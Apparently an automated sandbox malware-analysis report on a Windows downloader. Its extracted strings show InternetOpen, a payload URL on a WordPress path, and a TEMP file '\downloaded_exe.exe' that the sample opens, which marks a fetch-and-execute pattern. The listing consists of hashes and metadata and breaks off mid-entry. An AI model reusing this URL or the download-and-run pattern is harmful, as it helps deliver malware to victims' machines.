                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: InternetOpen
                                                        • String ID: EXEFetcher
                                                        • API String ID: 2038078732-2307415639
                                                        • Opcode ID: 501163fc4ad68184abd6f731b0e1190d20e3e9bcb8f653da2da3f31410ea594a
                                                        • Instruction ID: f0d8ad98668ef9dd1198a8317460a12d71eb4d120dd5dcff50e48926ddf294b2
                                                        • Opcode Fuzzy Hash: 501163fc4ad68184abd6f731b0e1190d20e3e9bcb8f653da2da3f31410ea594a
                                                        • Instruction Fuzzy Hash: 21510F36B1978698EB20EF65EC543E8A7A5FF48788F804036DD0D4BB6ADF68D244C314
                                                        Function 00007FF7020216C5 Relevance: .1, Instructions: 69COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 858b39ebf2218b046d187b62a5d2a940a2d70271bb7b31e9e29a6bf582fa66fe
                                                        • Instruction ID: 1806ae9ed92c5c6dfd74a5a820abce47e3e45d5bb786f244f7ef91b0648884c9
                                                        • Opcode Fuzzy Hash: 858b39ebf2218b046d187b62a5d2a940a2d70271bb7b31e9e29a6bf582fa66fe
                                                        • Instruction Fuzzy Hash: 87214D36B15B0589EB10EB66E8503AEA7A4BB4DB9CF440235EE4C53B59EFBCC140C754
                                                        Function 00007FF70203C320 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 113threadlibraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: Current$Thread$AddressHandleProcProcessValue$CreateDuplicateEventModulePriorityabort
                                                        • String ID: AddVectoredExceptionHandler$RemoveVectoredExceptionHandler$kernel32.dll
                                                        • API String ID: 1214264455-3889795909
                                                        • Opcode ID: c62fbbb500d360a4eecba260983cca29f84ffd0571e92934609e491812255220
                                                        • Instruction ID: 102965b7e06860536eb8ec5756aeeabeefea03aaeda8c8ffa0f5fd33d406e5b9
                                                        • Opcode Fuzzy Hash: c62fbbb500d360a4eecba260983cca29f84ffd0571e92934609e491812255220
                                                        • Instruction Fuzzy Hash: 4F416D33A09B0686EB50AF25BC45369BBA4FF45BA8F840235C95C83391EFBCD485C724
                                                        Function 00007FF70203CC10 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 139COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • TlsGetValue.KERNEL32(?,?,?,?,00007FF70211C190,\downloaded_exe.exe,?,?,00007FF7020D3345,000000CC,?,00007FF70211C190,\downloaded_exe.exe,00007FF7020DFD7B), ref: 00007FF70203CCBB
                                                        • TlsGetValue.KERNEL32(?,?,?,?,00007FF70211C190,\downloaded_exe.exe,?,?,00007FF7020D3345,000000CC,?,00007FF70211C190,\downloaded_exe.exe,00007FF7020DFD7B), ref: 00007FF70203CCE0
                                                        • TlsGetValue.KERNEL32(?,?,?,?,00007FF70211C190,\downloaded_exe.exe,?,?,00007FF7020D3345,000000CC,?,00007FF70211C190,\downloaded_exe.exe,00007FF7020DFD7B), ref: 00007FF70203CD07
                                                        • fprintf.MSVCRT ref: 00007FF70203CD53
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: Value$callocfprintf
                                                        • String ID: once %p is %ld$AddVectoredExceptionHandler$RemoveVectoredExceptionHandler$\downloaded_exe.exe$kernel32.dll
                                                        • API String ID: 811747394-1747696543
                                                        • Opcode ID: df6eb32c3796b987ef2b64bb0beb1c55b37abcd5e79dc7154bac5ceed4c21f24
                                                        • Instruction ID: feb2d7c13c8c54d41aa0de879304f90e21c60816cacaec2de0b9d5a6bb467d3b
                                                        • Opcode Fuzzy Hash: df6eb32c3796b987ef2b64bb0beb1c55b37abcd5e79dc7154bac5ceed4c21f24
                                                        • Instruction Fuzzy Hash: 07516C27A1D70685FA54BB15BD402B9BBA8BF49788FC44036D94D537A2EFBCE440C328
                                                        Function 00007FF7020218C9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 106COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: InternetOpen
                                                        • String ID: TEMP$\downloaded_exe.exe$https://ebitm.co.uk/salah/wp-includes/assets/ping.php$open
                                                        • API String ID: 2038078732-4269703112
                                                        • Opcode ID: 43d53239ad6a7d8941a5ec1ade7aaf49611c2654dd8d9449f1d5eff296e6231d
                                                        • Instruction ID: f92ed30867658a9c65c33dd553eba5953fec340ea8249b5fd9266854f78fa714
                                                        • Opcode Fuzzy Hash: 43d53239ad6a7d8941a5ec1ade7aaf49611c2654dd8d9449f1d5eff296e6231d
                                                        • Instruction Fuzzy Hash: 5D412A66A1A74699EF04EBA0E8543E8A764AF45348FC00036ED0D177AAEFACD148C364
                                                        Function 00007FF7020D71B0 Relevance: 3.9, APIs: 3, Instructions: 121COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: memcpy
                                                        • String ID:
                                                        • API String ID: 3510742995-0
                                                        • Opcode ID: 01afcbc40879e1f55adcbcaed10daca9f8508cc4ed4692c3284aa0a71ba5f3d5
                                                        • Instruction ID: b6d05be720c5aca5386e25c854c5ea07e60463761bac8696bb97563b4d93f1a3
                                                        • Opcode Fuzzy Hash: 01afcbc40879e1f55adcbcaed10daca9f8508cc4ed4692c3284aa0a71ba5f3d5
                                                        • Instruction Fuzzy Hash: DC31A467A0A78555DA61AB659D0017EEF90AF05BC4FD44032EE4C07765DFBCE542C324
                                                        Function 00007FF7020B6A50 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 245COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 238 7ff7020b6a50-7ff7020b6a78 call 7ff702046770 241 7ff7020b6b08-7ff7020b6b0a 238->241 242 7ff7020b6a7e-7ff7020b6a9e call 7ff7020b6240 call 7ff7020b6550 238->242 243 7ff7020b6aed-7ff7020b6af5 241->243 250 7ff7020b6aa3-7ff7020b6ae6 call 7ff7020af190 242->250 245 7ff7020b6b26-7ff7020b6b45 call 7ff70202fdd0 call 7ff7020e9840 call 7ff7020e9370 243->245 246 7ff7020b6af7-7ff7020b6b02 243->246 259 7ff7020b6b47-7ff7020b6ba2 call 7ff70202f530 call 7ff7020e9c10 call 7ff70204c700 call 7ff702046770 245->259 250->241 256 7ff7020b6ae8-7ff7020b6aeb 250->256 256->241 256->243 268 7ff7020b6c00-7ff7020b6c0f 259->268 269 7ff7020b6ba4-7ff7020b6ba8 259->269 270 7ff7020b6c15-7ff7020b6c1d 268->270 271 7ff7020b6d7e call 7ff70202fdd0 268->271 272 7ff7020b6c20-7ff7020b6c24 269->272 273 7ff7020b6baa-7ff7020b6bb4 269->273 278 7ff7020b6d83-7ff7020b6dab call 7ff7020e9fc0 call 7ff702046770 271->278 272->268 274 7ff7020b6c26 272->274 275 7ff7020b6d74-7ff7020b6d7c 273->275 276 7ff7020b6bba-7ff7020b6bc3 273->276 274->273 275->271 275->278 281 7ff7020b6c46-7ff7020b6c48 276->281 282 7ff7020b6bc9-7ff7020b6bcd 276->282 290 7ff7020b6dbd-7ff7020b6dc7 278->290 291 7ff7020b6dad-7ff7020b6db3 278->291 281->268 284 7ff7020b6bcf-7ff7020b6bd9 282->284 285 7ff7020b6c30-7ff7020b6c34 282->285 284->275 289 7ff7020b6bdf-7ff7020b6be7 284->289 285->268 288 7ff7020b6c36-7ff7020b6c40 call 7ff7020b6240 285->288 288->281 300 7ff7020b6d30-7ff7020b6d52 288->300 297 7ff7020b6c50-7ff7020b6c98 289->297 298 7ff7020b6be9-7ff7020b6bec 289->298 294 7ff7020b6dd0-7ff7020b6dd3 291->294 295 7ff7020b6db5 291->295 294->290 299 7ff7020b6dd5-7ff7020b6dd8 294->299 295->290 304 7ff7020b6d60-7ff7020b6d6f memcpy 297->304 305 7ff7020b6c9e-7ff7020b6cec 297->305 298->281 301 7ff7020b6bee-7ff7020b6bf9 298->301 299->290 302 7ff7020b6dda-7ff7020b6dec 299->302 300->268 307 7ff7020b6bff 301->307 308 7ff7020b6cf8-7ff7020b6d1c 301->308 304->305 305->268 307->268 308->268 310 7ff7020b6d22-7ff7020b6d24 308->310 310->268
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \downloaded_exe.exe
                                                        • API String ID: 0-1839852069
                                                        • Opcode ID: c7ecbfdaf90add3d2adb7fed4e272034ab308563b597bc64966b975d062da532
                                                        • Instruction ID: 9bb4b0774806e5bd71c8b1ba403f3dd8c25247db4227d2db3ec2038fd936b2b1
                                                        • Opcode Fuzzy Hash: c7ecbfdaf90add3d2adb7fed4e272034ab308563b597bc64966b975d062da532
                                                        • Instruction Fuzzy Hash: 2891B023E08B4584EB62AF39D8403B9AB64EF59F98F884231DE4C17399DF79E485C354
                                                        Function 00007FF7020D6FB0 Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: memcpy
                                                        • String ID:
                                                        • API String ID: 3510742995-0
                                                        • Opcode ID: a6c4ef7818d85ccb2f347f2c18e6e7ffc4e5e34466baa0e3179c86075ee3a1b2
                                                        • Instruction ID: 6fd448eb27a37f525df1f3e5b64894a04bc6e5d3d5177e510d29fa2055f27c3a
                                                        • Opcode Fuzzy Hash: a6c4ef7818d85ccb2f347f2c18e6e7ffc4e5e34466baa0e3179c86075ee3a1b2
                                                        • Instruction Fuzzy Hash: 0101D423A0AF5680EB10EA25E8106BCAF54AF41FC8FD88031EE4D433A6CF6ED442C314
                                                        Function 00007FF7020E94E0 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: malloc
                                                        • String ID:
                                                        • API String ID: 2803490479-0
                                                        • Opcode ID: bde42895535321941b1ed02203c161c6a39e199b196e9608092681d0c3821282
                                                        • Instruction ID: ece2ebcda03e84d59dd6a3f532d69b086fc067af9ecf42faf784a020b0e5533a
                                                        • Opcode Fuzzy Hash: bde42895535321941b1ed02203c161c6a39e199b196e9608092681d0c3821282
                                                        • Instruction Fuzzy Hash: 23F01CA3F0A74FA1FE59B759AC512B89A545F48788FC81438DD0D46392EFACA491C338

                                                        Non-executed Functions

                                                        Function 00007FF70203DDC0 Relevance: 38.0, APIs: 25, Instructions: 488sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: CreateEventSleep
                                                        • String ID:
                                                        • API String ID: 3100162736-0
                                                        • Opcode ID: 544db004dac4c16bf2eeb7f06814aef325d0f3bb79314e5ca04333d4e01ce6bc
                                                        • Instruction ID: 04a2d756a11dae00e811dce7aff49b1c3c7305664816f56c49ff44631a5d4d10
                                                        • Opcode Fuzzy Hash: 544db004dac4c16bf2eeb7f06814aef325d0f3bb79314e5ca04333d4e01ce6bc
                                                        • Instruction Fuzzy Hash: 38125E33A0C70281FB55BF25EE44379ABA8AF44B68F840631DD1D866D5DFBCE841C268
                                                        Function 00007FF70204C730 Relevance: 21.4, APIs: 12, Strings: 2, Instructions: 382stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: strlen$strcmp
                                                        • String ID: *$basic_string::append
                                                        • API String ID: 551667898-3732199748
                                                        • Opcode ID: 193b9043fcf6a56c7f3e33ede3d9e017b84f80eca0078f586ae37d39606bdb42
                                                        • Instruction ID: 0d1a64c1caea4e212ac40a63dc8cfee80741347b9a60bfdbdc4c6add12a93f8e
                                                        • Opcode Fuzzy Hash: 193b9043fcf6a56c7f3e33ede3d9e017b84f80eca0078f586ae37d39606bdb42
                                                        • Instruction Fuzzy Hash: CEE18F67B09B4681EB00AF26D84476EAB61AF45FC8F848132DE1D477A5CFBDE441C368
                                                        Function 00007FF702030950 Relevance: 20.9, APIs: 8, Strings: 3, Instructions: 1658stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: strlen
                                                        • String ID: $!$inity
                                                        • API String ID: 39653677-2254741344
                                                        • Opcode ID: 8ab908b22abba6d55c9b79863c7280601c1dacb4c477439e792540246c87ca6b
                                                        • Instruction ID: 9b9148f758fb69ed6842274c67ad52649d91cd1e310579f127384df077f60107
                                                        • Opcode Fuzzy Hash: 8ab908b22abba6d55c9b79863c7280601c1dacb4c477439e792540246c87ca6b
                                                        • Instruction Fuzzy Hash: BEF2913390C7868AE7609F15A9403AAFBA9FF84784F908135DA4D47B89DFBCE445CB14
                                                        Function 00007FF70202CF50 Relevance: 15.4, APIs: 4, Strings: 6, Instructions: 350stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: strlenstrncmp
                                                        • String ID: Z$Z$_$_$_$_GLOBAL_
                                                        • API String ID: 1310274236-662103887
                                                        • Opcode ID: 991a289d18bc42e40a84427d47d5bb9a3935f3bd3b4efc567f2ce29994a402cb
                                                        • Instruction ID: 03449c24ae43f91142113ca098d43c612333a6f6a32e730dd5bd1bb72b123680
                                                        • Opcode Fuzzy Hash: 991a289d18bc42e40a84427d47d5bb9a3935f3bd3b4efc567f2ce29994a402cb
                                                        • Instruction Fuzzy Hash: 92F1AE33A08B9289F760AF35D8543EDBFA1AF05788F844132DA4D16B99CFB8D949C354
                                                        Function 00007FF702039AB0 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 26libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$HandleLibraryLoadModule
                                                        • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                                                        • API String ID: 384173800-4041758303
                                                        • Opcode ID: 94e757e89cedf437bb5b933bdc55a882fdc96728ee98f681c994136fea7928c3
                                                        • Instruction ID: 2597ef8a3067b56c466af04ac537f75458400518826615c60903ea7005af484f
                                                        • Opcode Fuzzy Hash: 94e757e89cedf437bb5b933bdc55a882fdc96728ee98f681c994136fea7928c3
                                                        • Instruction Fuzzy Hash: 77F0F962A4EB5B90ED45B715FC900B4AFA4AF087A4BC40236C80E46760EFFCA44AC364
                                                        Function 00007FF702037100 Relevance: 12.7, APIs: 8, Instructions: 708COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: localeconv
                                                        • String ID:
                                                        • API String ID: 3737801528-0
                                                        • Opcode ID: ddbd8160efc2378f05ddf25ccbfbcb0278e48eaa86149276d6d6bdf522029acc
                                                        • Instruction ID: 13d47d7cc5ffe9ffc2e0f2cb1845ca68e9566126b0ec35fd5e7dab47fc7f4c0a
                                                        • Opcode Fuzzy Hash: ddbd8160efc2378f05ddf25ccbfbcb0278e48eaa86149276d6d6bdf522029acc
                                                        • Instruction Fuzzy Hash: AF5211B3A0C3864AE725AA249E403BDEE99FF45744FC44134DA4A477E5CBBCE940C728
                                                        Function 00007FF7020E3BA0 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 337COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
